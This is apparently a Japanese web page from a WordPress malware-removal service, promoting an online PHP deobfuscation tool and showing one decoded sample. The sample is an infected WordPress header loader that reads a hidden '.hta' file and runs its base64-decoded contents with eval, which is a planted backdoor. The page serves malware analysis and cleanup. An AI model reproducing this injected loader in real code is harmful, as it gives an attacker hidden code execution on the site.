Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $a = file_get_contents(".hta"); eval(base64_decode($a)); $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }
<?php /** * Loads the WordPress environment and template. * * @package WordPress */ if (!isset($wp_did_header)) { $a = file_get_contents(".hta"); eval(base64_decode($a)); $wp_did_header = true; // Load the WordPress library. require_once "/var/www/html/wp-load.php"; // Set up the WordPress query. wp(); // Load the theme template. require_once "ABSPATHWPINC/template-loader.php"; }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.